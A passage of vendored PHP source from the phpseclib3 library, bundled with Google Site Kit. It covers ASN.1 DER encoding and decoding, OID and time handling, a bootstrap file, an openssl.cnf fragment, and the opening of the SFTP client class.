1 << $j); } $offset = 0; } $values = []; $map = \array_reverse($mapping['mapping']); foreach ($map as $i => $value) { if ($bits[$i]) { $values[] = $value; } } return $values; } // fall-through case self::TYPE_OCTET_STRING: return $decoded['content']; case self::TYPE_NULL: return ''; case self::TYPE_BOOLEAN: case self::TYPE_NUMERIC_STRING: case self::TYPE_PRINTABLE_STRING: case self::TYPE_TELETEX_STRING: case self::TYPE_VIDEOTEX_STRING: case self::TYPE_IA5_STRING: case self::TYPE_GRAPHIC_STRING: case self::TYPE_VISIBLE_STRING: case self::TYPE_GENERAL_STRING: case self::TYPE_UNIVERSAL_STRING: case self::TYPE_UTF8_STRING: case self::TYPE_BMP_STRING: return $decoded['content']; case self::TYPE_INTEGER: case self::TYPE_ENUMERATED: $temp = $decoded['content']; if (isset($mapping['implicit'])) { $temp = new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger($decoded['content'], -256); } if (isset($mapping['mapping'])) { $temp = (int) $temp->toString(); return isset($mapping['mapping'][$temp]) ? $mapping['mapping'][$temp] : \false; } return $temp; } } /** * DER-decode the length * * DER supports lengths up to (2**8)**127, however, we'll only support lengths up to (2**8)**4. See * {@link http://itu.int/ITU-T/studygroups/com17/languages/X.690-0207.pdf#p=13 X.690 paragraph 8.1.3} for more information. * * @param string $string * @return int */ public static function decodeLength(&$string) { $length = \ord(\Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::shift($string)); if ($length & 0x80) { // definite length, long form $length &= 0x7f; $temp = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::shift($string, $length); list(, $length) = \unpack('N', \substr(\str_pad($temp, 4, \chr(0), \STR_PAD_LEFT), -4)); } return $length; } /** * ASN.1 Encode * * DER-encodes an ASN.1 semantic mapping ($mapping). Some libraries would probably call this function * an ASN.1 compiler. * * "Special" mappings can be applied via $special. * * @param Element|string|array $source * @param array $mapping * @param array $special * @return string */ public static function encodeDER($source, $mapping, $special = []) { self::$location = []; return self::encode_der($source, $mapping, null, $special); } /** * ASN.1 Encode (Helper function) * * @param Element|string|array|null $source * @param array $mapping * @param int $idx * @param array $special * @return string */ private static function encode_der($source, array $mapping, $idx = null, array $special = []) { if ($source instanceof \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Element) { return $source->element; } // do not encode (implicitly optional) fields with value set to default if (isset($mapping['default']) && $source === $mapping['default']) { return ''; } if (isset($idx)) { if (isset($special[$idx])) { $source = $special[$idx]($source); } self::$location[] = $idx; } $tag = $mapping['type']; switch ($tag) { case self::TYPE_SET: // Children order is not important, thus process in sequence. case self::TYPE_SEQUENCE: $tag |= 0x20; // set the constructed bit // ignore the min and max if (isset($mapping['min']) && isset($mapping['max'])) { $value = []; $child = $mapping['children']; foreach ($source as $content) { $temp = self::encode_der($content, $child, null, $special); if ($temp === \false) { return \false; } $value[] = $temp; } /* "The encodings of the component values of a set-of value shall appear in ascending order, the encodings being compared as octet strings with the shorter components being padded at their trailing end with 0-octets. NOTE - The padding octets are for comparison purposes only and do not appear in the encodings." -- sec 11.6 of http://www.itu.int/ITU-T/studygroups/com17/languages/X.690-0207.pdf */ if ($mapping['type'] == self::TYPE_SET) { \sort($value); } $value = \implode('', $value); break; } $value = ''; foreach ($mapping['children'] as $key => $child) { if (!\array_key_exists($key, $source)) { if (!isset($child['optional'])) { return \false; } continue; } $temp = self::encode_der($source[$key], $child, $key, $special); if ($temp === \false) { return \false; } // An empty child encoding means it has been optimized out. // Else we should have at least one tag byte. if ($temp === '') { continue; } // if isset($child['constant']) is true then isset($child['optional']) should be true as well if (isset($child['constant'])) { /* From X.680-0207.pdf#page=58 (30.6): "The tagging construction specifies explicit tagging if any of the following holds: ... c) the "Tag Type" alternative is used and the value of "TagDefault" for the module is IMPLICIT TAGS or AUTOMATIC TAGS, but the type defined by "Type" is an untagged choice type, an untagged open type, or an untagged "DummyReference" (see ITU-T Rec. X.683 | ISO/IEC 8824-4, 8.3)." */ if (isset($child['explicit']) || $child['type'] == self::TYPE_CHOICE) { $subtag = \chr(self::CLASS_CONTEXT_SPECIFIC << 6 | 0x20 | $child['constant']); $temp = $subtag . self::encodeLength(\strlen($temp)) . $temp; } else { $subtag = \chr(self::CLASS_CONTEXT_SPECIFIC << 6 | \ord($temp[0]) & 0x20 | $child['constant']); $temp = $subtag . \substr($temp, 1); } } $value .= $temp; } break; case self::TYPE_CHOICE: $temp = \false; foreach ($mapping['children'] as $key => $child) { if (!isset($source[$key])) { continue; } $temp = self::encode_der($source[$key], $child, $key, $special); if ($temp === \false) { return \false; } // An empty child encoding means it has been optimized out. // Else we should have at least one tag byte. if ($temp === '') { continue; } $tag = \ord($temp[0]); // if isset($child['constant']) is true then isset($child['optional']) should be true as well if (isset($child['constant'])) { if (isset($child['explicit']) || $child['type'] == self::TYPE_CHOICE) { $subtag = \chr(self::CLASS_CONTEXT_SPECIFIC << 6 | 0x20 | $child['constant']); $temp = $subtag . self::encodeLength(\strlen($temp)) . $temp; } else { $subtag = \chr(self::CLASS_CONTEXT_SPECIFIC << 6 | \ord($temp[0]) & 0x20 | $child['constant']); $temp = $subtag . \substr($temp, 1); } } } if (isset($idx)) { \array_pop(self::$location); } if ($temp && isset($mapping['cast'])) { $temp[0] = \chr($mapping['class'] << 6 | $tag & 0x20 | $mapping['cast']); } return $temp; case self::TYPE_INTEGER: case self::TYPE_ENUMERATED: if (!isset($mapping['mapping'])) { if (\is_numeric($source)) { $source = new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger($source); } $value = $source->toBytes(\true); } else { $value = \array_search($source, $mapping['mapping']); if ($value === \false) { return \false; } $value = new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger($value); $value = $value->toBytes(\true); } if (!\strlen($value)) { $value = \chr(0); } break; case self::TYPE_UTC_TIME: case self::TYPE_GENERALIZED_TIME: $format = $mapping['type'] == self::TYPE_UTC_TIME ? 'y' : 'Y'; $format .= 'mdHis'; // if $source does _not_ include timezone information within it then assume that the timezone is GMT $date = new \DateTime($source, new \DateTimeZone('GMT')); // if $source _does_ include timezone information within it then convert the time to GMT $date->setTimezone(new \DateTimeZone('GMT')); $value = $date->format($format) . 'Z'; break; case self::TYPE_BIT_STRING: if (isset($mapping['mapping'])) { $bits = \array_fill(0, \count($mapping['mapping']), 0); $size = 0; for ($i = 0; $i < \count($mapping['mapping']); $i++) { if (\in_array($mapping['mapping'][$i], $source)) { $bits[$i] = 1; $size = $i; } } if (isset($mapping['min']) && $mapping['min'] >= 1 && $size < $mapping['min']) { $size = $mapping['min'] - 1; } $offset = 8 - ($size + 1 & 7); $offset = $offset !== 8 ? $offset : 0; $value = \chr($offset); for ($i = $size + 1; $i < \count($mapping['mapping']); $i++) { unset($bits[$i]); } $bits = \implode('', \array_pad($bits, $size + $offset + 1, 0)); $bytes = \explode(' ', \rtrim(\chunk_split($bits, 8, ' '))); foreach ($bytes as $byte) { $value .= \chr(\bindec($byte)); } break; } // fall-through case self::TYPE_OCTET_STRING: /* The initial octet shall encode, as an unsigned binary integer with bit 1 as the least significant bit, the number of unused bits in the final subsequent octet. The number shall be in the range zero to seven. -- http://www.itu.int/ITU-T/studygroups/com17/languages/X.690-0207.pdf#page=16 */ $value = $source; break; case self::TYPE_OBJECT_IDENTIFIER: $value = self::encodeOID($source); break; case self::TYPE_ANY: $loc = self::$location; if (isset($idx)) { \array_pop(self::$location); } switch (\true) { case !isset($source): return self::encode_der(null, ['type' => self::TYPE_NULL] + $mapping, null, $special); case \is_int($source): case $source instanceof \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger: return self::encode_der($source, ['type' => self::TYPE_INTEGER] + $mapping, null, $special); case \is_float($source): return self::encode_der($source, ['type' => self::TYPE_REAL] + $mapping, null, $special); case \is_bool($source): return self::encode_der($source, ['type' => self::TYPE_BOOLEAN] + $mapping, null, $special); case \is_array($source) && \count($source) == 1: $typename = \implode('', \array_keys($source)); $outtype = \array_search($typename, self::ANY_MAP, \true); if ($outtype !== \false) { return self::encode_der($source[$typename], ['type' => $outtype] + $mapping, null, $special); } } $filters = self::$filters; foreach ($loc as $part) { if (!isset($filters[$part])) { $filters = \false; break; } $filters = $filters[$part]; } if ($filters === \false) { throw new \RuntimeException('No filters defined for ' . \implode('/', $loc)); } return self::encode_der($source, $filters + $mapping, null, $special); case self::TYPE_NULL: $value = ''; break; case self::TYPE_NUMERIC_STRING: case self::TYPE_TELETEX_STRING: case self::TYPE_PRINTABLE_STRING: case self::TYPE_UNIVERSAL_STRING: case self::TYPE_UTF8_STRING: case self::TYPE_BMP_STRING: case self::TYPE_IA5_STRING: case self::TYPE_VISIBLE_STRING: case self::TYPE_VIDEOTEX_STRING: case self::TYPE_GRAPHIC_STRING: case self::TYPE_GENERAL_STRING: $value = $source; break; case self::TYPE_BOOLEAN: $value = $source ? "\xff" : "\x00"; break; default: throw new \RuntimeException('Mapping provides no type definition for ' . \implode('/', self::$location)); } if (isset($idx)) { \array_pop(self::$location); } if (isset($mapping['cast'])) { if (isset($mapping['explicit']) || $mapping['type'] == self::TYPE_CHOICE) { $value = \chr($tag) . self::encodeLength(\strlen($value)) . $value; $tag = $mapping['class'] << 6 | 0x20 | $mapping['cast']; } else { $tag = $mapping['class'] << 6 | \ord($temp[0]) & 0x20 | $mapping['cast']; } } return \chr($tag) . self::encodeLength(\strlen($value)) . $value; } /** * BER-decode the OID * * Called by _decode_ber() * * @param string $content * @return string */ public static function decodeOID($content) { static $eighty; if (!$eighty) { $eighty = new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger(80); } $oid = []; $pos = 0; $len = \strlen($content); // see https://github.com/openjdk/jdk/blob/2deb318c9f047ec5a4b160d66a4b52f93688ec42/src/java.base/share/classes/sun/security/util/ObjectIdentifier.java#L55 if ($len > 4096) { //throw new \RuntimeException("Object identifier size is limited to 4096 bytes ($len bytes present)"); return \false; } if (\ord($content[$len - 1]) & 0x80) { return \false; } $n = new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger(); while ($pos < $len) { $temp = \ord($content[$pos++]); $n = $n->bitwise_leftShift(7); $n = $n->bitwise_or(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger($temp & 0x7f)); if (~$temp & 0x80) { $oid[] = $n; $n = new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger(); } } $part1 = \array_shift($oid); $first = \floor(\ord($content[0]) / 40); /* "This packing of the first two object identifier components recognizes that only three values are allocated from the root node, and at most 39 subsequent values from nodes reached by X = 0 and X = 1." -- https://www.itu.int/ITU-T/studygroups/com17/languages/X.690-0207.pdf#page=22 */ if ($first <= 2) { // ie. 0 <= ord($content[0]) < 120 (0x78) \array_unshift($oid, \ord($content[0]) % 40); \array_unshift($oid, $first); } else { \array_unshift($oid, $part1->subtract($eighty)); \array_unshift($oid, 2); } return \implode('.', $oid); } /** * DER-encode the OID * * Called by _encode_der() * * @param string $source * @return string */ public static function encodeOID($source) { static $mask, $zero, $forty; if (!$mask) { $mask = new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger(0x7f); $zero = new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger(); $forty = new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger(40); } if (!\preg_match('#(?:\\d+\\.)+#', $source)) { $oid = isset(self::$reverseOIDs[$source]) ? self::$reverseOIDs[$source] : \false; } else { $oid = $source; } if ($oid === \false) { throw new \RuntimeException('Invalid OID'); } $parts = \explode('.', $oid); $part1 = \array_shift($parts); $part2 = \array_shift($parts); $first = new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger($part1); $first = $first->multiply($forty); $first = $first->add(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger($part2)); \array_unshift($parts, $first->toString()); $value = ''; foreach ($parts as $part) { if (!$part) { $temp = "\x00"; } else { $temp = ''; $part = new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger($part); while (!$part->equals($zero)) { $submask = $part->bitwise_and($mask); $submask->setPrecision(8); $temp = (\chr(0x80) | $submask->toBytes()) . $temp; $part = $part->bitwise_rightShift(7); } $temp[\strlen($temp) - 1] = $temp[\strlen($temp) - 1] & \chr(0x7f); } $value .= $temp; } return $value; } /** * BER-decode the time * * Called by _decode_ber() and in the case of implicit tags asn1map(). * * @param string $content * @param int $tag * @return \DateTime|false */ private static function decodeTime($content, $tag) { /* UTCTime: http://tools.ietf.org/html/rfc5280#section-4.1.2.5.1 http://www.obj-sys.com/asn1tutorial/node15.html GeneralizedTime: http://tools.ietf.org/html/rfc5280#section-4.1.2.5.2 http://www.obj-sys.com/asn1tutorial/node14.html */ $format = 'YmdHis'; if ($tag == self::TYPE_UTC_TIME) { // https://www.itu.int/ITU-T/studygroups/com17/languages/X.690-0207.pdf#page=28 says "the seconds // element shall always be present" but none-the-less I've seen X509 certs where it isn't and if the // browsers parse it phpseclib ought to too if (\preg_match('#^(\\d{10})(Z|[+-]\\d{4})$#', $content, $matches)) { $content = $matches[1] . '00' . $matches[2]; } $prefix = \substr($content, 0, 2) >= 50 ? '19' : '20'; $content = $prefix . $content; } elseif (\strpos($content, '.') !== \false) { $format .= '.u'; } if ($content[\strlen($content) - 1] == 'Z') { $content = \substr($content, 0, -1) . '+0000'; } if (\strpos($content, '-') !== \false || \strpos($content, '+') !== \false) { $format .= 'O'; } // error supression isn't necessary as of PHP 7.0: // http://php.net/manual/en/migration70.other-changes.php return @\DateTime::createFromFormat($format, $content); } /** * Set the time format * * Sets the time / date format for asn1map(). * * @param string $format */ public static function setTimeFormat($format) { self::$format = $format; } /** * Load OIDs * * Load the relevant OIDs for a particular ASN.1 semantic mapping. * Previously loaded OIDs are retained. * * @param array $oids */ public static function loadOIDs(array $oids) { self::$reverseOIDs += $oids; self::$oids = \array_flip(self::$reverseOIDs); } /** * Set filters * * See \phpseclib3\File\X509, etc, for an example. * Previously loaded filters are not retained. * * @param array $filters */ public static function setFilters(array $filters) { self::$filters = $filters; } /** * String type conversion * * This is a lazy conversion, dealing only with character size. * No real conversion table is used. * * @param string $in * @param int $from * @param int $to * @return string */ public static function convert($in, $from = self::TYPE_UTF8_STRING, $to = self::TYPE_UTF8_STRING) { // isset(self::STRING_TYPE_SIZE[$from] returns a fatal error on PHP 5.6 if (!\array_key_exists($from, self::STRING_TYPE_SIZE) || !\array_key_exists($to, self::STRING_TYPE_SIZE)) { return \false; } $insize = self::STRING_TYPE_SIZE[$from]; $outsize = self::STRING_TYPE_SIZE[$to]; $inlength = \strlen($in); $out = ''; for ($i = 0; $i < $inlength;) { if ($inlength - $i < $insize) { return \false; } // Get an input character as a 32-bit value. $c = \ord($in[$i++]); switch (\true) { case $insize == 4: $c = $c << 8 | \ord($in[$i++]); $c = $c << 8 | \ord($in[$i++]); // fall-through case $insize == 2: $c = $c << 8 | \ord($in[$i++]); // fall-through case $insize == 1: break; case ($c & 0x80) == 0x0: break; case ($c & 0x40) == 0x0: return \false; default: $bit = 6; do { if ($bit > 25 || $i >= $inlength || (\ord($in[$i]) & 0xc0) != 0x80) { return \false; } $c = $c << 6 | \ord($in[$i++]) & 0x3f; $bit += 5; $mask = 1 << $bit; } while ($c & $bit); $c &= $mask - 1; break; } // Convert and append the character to output string. $v = ''; switch (\true) { case $outsize == 4: $v .= \chr($c & 0xff); $c >>= 8; $v .= \chr($c & 0xff); $c >>= 8; // fall-through case $outsize == 2: $v .= \chr($c & 0xff); $c >>= 8; // fall-through case $outsize == 1: $v .= \chr($c & 0xff); $c >>= 8; if ($c) { return \false; } break; case ($c & (\PHP_INT_SIZE == 8 ? 0x80000000 : 1 << 31)) != 0: return \false; case $c >= 0x4000000: $v .= \chr(0x80 | $c & 0x3f); $c = $c >> 6 | 0x4000000; // fall-through case $c >= 0x200000: $v .= \chr(0x80 | $c & 0x3f); $c = $c >> 6 | 0x200000; // fall-through case $c >= 0x10000: $v .= \chr(0x80 | $c & 0x3f); $c = $c >> 6 | 0x10000; // fall-through case $c >= 0x800: $v .= \chr(0x80 | $c & 0x3f); $c = $c >> 6 | 0x800; // fall-through case $c >= 0x80: $v .= \chr(0x80 | $c & 0x3f); $c = $c >> 6 | 0xc0; // fall-through default: $v .= \chr($c); break; } $out .= \strrev($v); } return $out; } /** * Extract raw BER from Base64 encoding * * @param string $str * @return string */ public static function extractBER($str) { /* X.509 certs are assumed to be base64 encoded but sometimes they'll have additional things in them * above and beyond the ceritificate. * ie. some may have the following preceding the -----BEGIN CERTIFICATE----- line: * * Bag Attributes * localKeyID: 01 00 00 00 * subject=/O=organization/OU=org unit/CN=common name * issuer=/O=organization/CN=common name */ if (\strlen($str) > \ini_get('pcre.backtrack_limit')) { $temp = $str; } else { $temp = \preg_replace('#.*?^-+[^-]+-+[\\r\\n ]*$#ms', '', $str, 1); $temp = \preg_replace('#-+END.*[\\r\\n ]*.*#ms', '', $temp, 1); } // remove new lines $temp = \str_replace(["\r", "\n", ' '], '', $temp); // remove the -----BEGIN CERTIFICATE----- and -----END CERTIFICATE----- stuff $temp = \preg_replace('#^-+[^-]+-+|-+[^-]+-+$#', '', $temp); $temp = \preg_match('#^[a-zA-Z\\d/+]*={0,2}$#', $temp) ? \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::base64_decode($temp) : \false; return $temp != \false ? $temp : $str; } /** * DER-encode the length * * DER supports lengths up to (2**8)**127, however, we'll only support lengths up to (2**8)**4. See * {@link http://itu.int/ITU-T/studygroups/com17/languages/X.690-0207.pdf#p=13 X.690 paragraph 8.1.3} for more information. * * @param int $length * @return string */ public static function encodeLength($length) { if ($length <= 0x7f) { return \chr($length); } $temp = \ltrim(\pack('N', $length), \chr(0)); return \pack('Ca*', 0x80 | \strlen($temp), $temp); } /** * Returns the OID corresponding to a name * * What's returned in the associative array returned by loadX509() (or load*()) is either a name or an OID if * no OID to name mapping is available. The problem with this is that what may be an unmapped OID in one version * of phpseclib may not be unmapped in the next version, so apps that are looking at this OID may not be able * to work from version to version. * * This method will return the OID if a name is passed to it and if no mapping is avialable it'll assume that * what's being passed to it already is an OID and return that instead. A few examples. * * getOID('2.16.840.1.101.3.4.2.1') == '2.16.840.1.101.3.4.2.1' * getOID('id-sha256') == '2.16.840.1.101.3.4.2.1' * getOID('zzz') == 'zzz' * * @param string $name * @return string */ public static function getOID($name) { return isset(self::$reverseOIDs[$name]) ? self::$reverseOIDs[$name] : $name; } } <?php namespace Google\Site_Kit_Dependencies; /** * Bootstrapping File for phpseclib * * composer isn't a requirement for phpseclib 2.0 but this file isn't really required * either. it's a bonus for those using composer but if you're not phpseclib will * still work * * @license http://www.opensource.org/licenses/mit-license.html MIT License */ if (\extension_loaded('mbstring')) { // 2 - MB_OVERLOAD_STRING // mbstring.func_overload is deprecated in php 7.2 and removed in php 8.0. if (\version_compare(\PHP_VERSION, '8.0.0') < 0 && \ini_get('mbstring.func_overload') & 2) { throw new \UnexpectedValueException('Overloading of string functions using mbstring.func_overload ' . 'is not supported by phpseclib.'); } } # minimalist openssl.cnf file for use with phpseclib HOME = . RANDFILE = $ENV::HOME/.rnd [ v3_ca ] <?php /** * Pure-PHP implementation of SFTP. * * PHP version 5 * * Supports SFTPv2/3/4/5/6. Defaults to v3. * * The API for this library is modeled after the API from PHP's {@link http://php.net/book.ftp FTP extension}. * * Here's a short example of how to use this library: * <code> * <?php * include 'vendor/autoload.php'; * * $sftp = new \phpseclib3\Net\SFTP('www.domain.tld'); * if (!$sftp->login('username', 'password')) { * exit('Login Failed'); * } * * echo $sftp->pwd() . "\r\n"; * $sftp->put('filename.ext', 'hello, world!'); * print_r($sftp->nlist()); * ?> * </code> * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2009 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\Net; use Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings; use Google\Site_Kit_Dependencies\phpseclib3\Exception\FileNotFoundException; /** * Pure-PHP implementations of SFTP. * * @author Jim Wigginton <terrafrost@php.net> */ class SFTP extends \Google\Site_Kit_Dependencies\phpseclib3\Net\SSH2 { /** * SFTP channel constant * * \phpseclib3\Net\SSH2::exec() uses 0 and \phpseclib3\Net\SSH2::read() / \phpseclib3\Net\SSH2::write() use 1. * * @see \phpseclib3\Net\SSH2::send_channel_packet() * @see \phpseclib3\Net\SSH2::get_channel_packet() */ const CHANNEL = 0x100; /** * Reads data from a local file. * * @see \phpseclib3\Net\SFTP::put() */ const SOURCE_LOCAL_FILE = 1; /** * Reads data from a string. * * @see \phpseclib3\Net\SFTP::put() */ // this value isn't really used anymore but i'm keeping it reserved for historical reasons const SOURCE_STRING = 2; /** * Reads data from callback: * function callback($length) returns string to proceed, null for EOF * * @see \phpseclib3\Net\SFTP::put() */ const SOURCE_CALLBACK = 16; /** * Resumes an upload * * @see \phpseclib3\Net\SFTP::put() */ const RESUME = 4; /** * Append a local file to an already existing remote file * * @see \phpseclib3\Net\SFTP::put() */ const RESUME_START = 8; /** * Packet Types * * @see self::__construct() * @var array * @access private */ private static $packet_types = []; /** * Status Codes * * @see self::__construct() * @var array * @access private */ private static $status_codes = []; /** @var array<int, string> */ private static $attributes; /** @var array<int, string> */ private static $open_flags; /** @var array<int, string> */ private static $open_flags5; /** @var array<int, string> */ private static $file_types; /** * The Request ID * * The request ID exists in the off chance that a packet is sent out-of-order. Of course, this library doesn't support * concurrent actions, so it's somewhat academic, here. * * @var boolean * @see self::_send_sftp_packet() */ private $use_request_id = \false; /** * The Packet Type * * The request ID exists in the off chance that a packet is sent out-of-order. Of course, this library doesn't support * concurrent actions, so it's somewhat academic, here. * * @var int * @see self::_get_sftp_packet() */ private $packet_type = -1; /** * Packet Buffer * * @var string * @see self::_get_sftp_packet() */ private $packet_buffer = ''; /** * Extensions supported by the server * * @var array * @see self::_initChannel() */ private $extensions = []; /** * Server SFTP version * * @var int * @see self::_initChannel() */ private $version; /** * Default Server SFTP version * * @var int * @see self::_initChannel() */ private $defaultVersion; /** * Preferred SFTP version * * @var int * @see self::_initChannel() */ private $preferredVersion = 3; /** * Current working directory * * @var string|bool * @see self::realpath() * @see self::chdir() */ private $pwd = \false; /** * Packet Type Log * * @see self::getLog() * @var array */ private $packet_type_log = []; /** * Packet Log * * @see self::getLog() * @var array */ private $packet_log = []; /** * Real-time log file pointer * * @see self::_append_log() * @var resource|closed-resource */ private $realtime_log_file; /** * Real-time log file size * * @see self::_append_log() * @var int */ private $realtime_log_size; /** * Real-time log file wrap boolean * * @see self::_append_log() * @var bool */ private $realtime_log_wrap; /** * Current log size * * Should never exceed self::LOG_MAX_SIZE * * @var int */ private $log_size; /** * Error information * * @see self::getSFTPErrors() * @see self::getLastSFTPError() * @var array */ private $sftp_errors = []; /** * Stat Cache * * Rather than always having to open a directory and close it immediately there after to see if a file is a directory * we'll cache the results. * * @see self::_update_stat_cache() * @see self::_remove_from_stat_cache() * @see self::_query_stat_cache() * @var array */ private $stat_cache = []; /** * Max SFTP Packet Size * * @see self::__construct() * @see self::get() * @var int */ private $max_sftp_packet; /** * Stat Cache Flag * * @see self::disableStatCache() * @see self::enableStatCache() * @var bool */ private $use_stat_cache = \true; /** * Sort Options * * @see self::_comparator() * @see self::setListOrder() * @var array */ protected $sortOptions = []; /** * Canonicalization Flag * * Determines whether or not paths should be canonicalized before being * passed on to the remote server. * * @see self::enablePathCanonicalization() * @see self::disablePathCanonicalization() * @see self::realpath() * @var bool */ private $canonicalize_paths = \true; /** * Request Buffers * * @see self::_get_sftp_packet() * @var array */ private $requestBuffer = []; /** * Preserve timestamps on file downloads / uploads * * @see self::get() * @see self::put() * @var bool */ private $preserveTime = \false; /** * Arbitrary Length Packets Flag * * Determines whether or not packets of any length should be allowed, * in cases where the server chooses the packet length (such as * directory listings). By default, packets are only allowed to be * 256 * 1024 bytes (SFTP_MAX_MSG_LENGTH from OpenSSH's sftp-common.h) * * @see self::enableArbitraryLengthPackets() * @see self::_get_sftp_packet() * @var bool */ private $allow_arbitrary_length_packets = \false; /** * Was the last packet due to the channels being closed or not? * * @see self::get() * @see self::get_sftp_packet() * @var bool */ private $channel_close = \false; /** * Has the SFTP channel been partially negotiated? * * @var bool */ private $partial_init = \false; /** * Default Constructor. * * Connects to an SFTP server * * $host can either be a string, representing the host, or a stream resource. * * @param mixed $host * @param int $port * @param int $timeout */ public function __construct($host, $port = 22, $timeout = 10) { parent::__construct($host, $port, $timeout); $this->max_sftp_packet = 1 << 15; if (empty(self::$packet_types)) { self::$packet_types = [1 => 'NET_SFTP_INIT', 2 => 'NET_SFTP_VERSION', 3 => 'NET_SFTP_OPEN', 4 => 'NET_SFTP_CLOSE', 5 => 'NET_SFTP_READ', 6 => 'NET_SFTP_WRITE', 7 => 'NET_SFTP_LSTAT', 9 => 'NET_SFTP_SETSTAT', 10 => 'NET_SFTP_FSETSTAT', 11 => 'NET_SFTP_OPENDIR', 12 => 'NET_SFTP_READDIR', 13 => 'NET_SFTP_REMOVE', 14 => 'NET_SFTP_MKDIR', 15 => 'NET_SFTP_RMDIR', 16 => 'NET_SFTP_REALPATH', 17 => 'NET_SFTP_STAT', 18 => 'NET_SFTP_RENAME', 19 => 'NET_SFTP_READLINK', 20 => 'NET_SFTP_SYMLINK', 21 => 'NET_SFTP_LINK', 101 => 'NET_SFTP_STATUS', 102 => 'NET_SFTP_HANDLE', 103 => 'NET_SFTP_DATA', 104 => 'NET_SFTP_NAME', 105 => 'NET_SFTP_ATTRS', 200 => 'NET_SFTP_EXTENDED', 201 => 'NET_SFTP_EXTENDED_REPLY']; self::$status_codes = [0 => 'NET_SFTP_STATUS_OK', 1 => 'NET_SFTP_STATUS_EOF', 2 => 'NET_SFTP_STATUS_NO_SUCH_FILE', 3 => 'NET_SFTP_STATUS_PERMISSION_DENIED', 4 => 'NET_SFTP_STATUS_FAILURE', 5 => 'NET_SFTP_STATUS_BAD_MESSAGE', 6 => 'NET_SFTP_STATUS_NO_CONNECTION', 7 => 'NET_SFTP_STATUS_CONNECTION_LOST', 8 => 'NET_SFTP_STATUS_OP_UNSUPPORTED', 9 => 'NET_SFTP_STATUS_INVALID_HANDLE', 10 => 'NET_SFTP_STATUS_NO_SUCH_PATH', 11 => 'NET_SFTP_STATUS_FILE_ALREADY_EXISTS', 12 => 'NET_SFTP_STATUS_WRITE_PROTECT', 13 => 'NET_SFTP_STATUS_NO_MEDIA', 14 => 'NET_SFTP_STATUS_NO_SPACE_ON_FILESYSTEM', 15 => 'NET_SFTP_STATUS_QUOTA_EXCEEDED', 16 => 'NET_SFTP_STATUS_UNKNOWN_PRINCIPAL', 17 => 'NET_SFTP_STATUS_LOCK_CONFLICT', 18 => 'NET_SFTP_STATUS_DIR_NOT_EMPTY', 19 => 'NET_SFTP_STATUS_NOT_A_DIRECTORY', 20 => 'NET_SFTP_STATUS_INVALID_FILENAME', 21 => 'NET_SFTP_STATUS_LINK_LOOP', 22 => 'NET_SFTP_STATUS_CANNOT_DELETE', 23 => 'NET_SFTP_STATUS_INVALID_PARAMETER', 24 => 'NET_SFTP_STATUS_FILE_IS_A_DIRECTORY', 25 => 'NET_SFTP_STATUS_BYTE_RANGE_LOCK_CONFLICT', 26 => 'NET_SFTP_STATUS_BYTE_RANGE_LOCK_REFUSED', 27 => 'NET_SFTP_STATUS_DELETE_PENDING', 28 => 'NET_SFTP_STATUS_FILE_CORRUPT', 29 => 'NET_SFTP_STATUS_OWNER_INVALID', 30 => 'NET_SFTP_STATUS_GROUP_INVALID', 31 => 'NET_SFTP_STATUS_NO_MATCHING_BYTE_RANGE_LOCK']; // http://tools.ietf.org/html/draft-ietf-secsh-filexfer-13#section-7.1 // the order, in this case, matters quite a lot - see \phpseclib3\Net\SFTP::_parseAttributes() to understand why self::$attributes = [ 0x1 => 'NET_SFTP_ATTR_SIZE', 0x2 => 'NET_SFTP_ATTR_UIDGID', // defined in SFTPv3, removed in SFTPv4+ 0x80 => 'NET_SFTP_ATTR_OWNERGROUP', // defined in SFTPv4+ 0x4 => 'NET_SFTP_ATTR_PERMISSIONS', 0x8 => 'NET_SFTP_ATTR_ACCESSTIME', 0x10 => 'NET_SFTP_ATTR_CREATETIME', // SFTPv4+ 0x20 => 'NET_SFTP_ATTR_MODIFYTIME', 0x40 => 'NET_SFTP_ATTR_ACL', 0x100 => 'NET_SFTP_ATTR_SUBSECOND_TIMES', 0x200 => 'NET_SFTP_ATTR_BITS', // SFTPv5+ 0x400 => 'NET_SFTP_ATTR_ALLOCATION_SIZE', // SFTPv6+ 0x800 => 'NET_SFTP_ATTR_TEXT_HINT', 0x1000 => 'NET_SFTP_ATTR_MIME_TYPE', 0x2000 => 'NET_SFTP_ATTR_LINK_COUNT', 0x4000 => 'NET_SFTP_ATTR_UNTRANSLATED_NAME', 0x8000 => 'NET_SFTP_ATTR_CTIME', // 0x80000000 will yield a floating point on 32-bit systems and converting floating points to integers // yields inconsistent behavior depending on how php is compiled. so we left shift -1 (which, in // two's compliment, consists of all 1 bits) by 31. on 64-bit systems this'll yield 0xFFFFFFFF80000000. // that's not a problem, however, and 'anded' and a 32-bit number, as all the leading 1 bits are ignored. \PHP_INT_SIZE == 4 ? -1 << 31 : 0x80000000 => 'NET_SFTP_ATTR_EXTENDED', ]; // http://tools.ietf.org/html/draft-ietf-secsh-filexfer-04#section-6.3 // the flag definitions change somewhat in SFTPv5+. if SFTPv5+ support is added to this library, maybe name // the array for that $this->open5_flags and similarly alter the constant names. self::$open_flags = [0x1 => 'NET_SFTP_OPEN_READ', 0x2 => 'NET_SFTP_OPEN_WRITE', 0x4 => 'NET_SFTP_OPEN_APPEND', 0x8 => 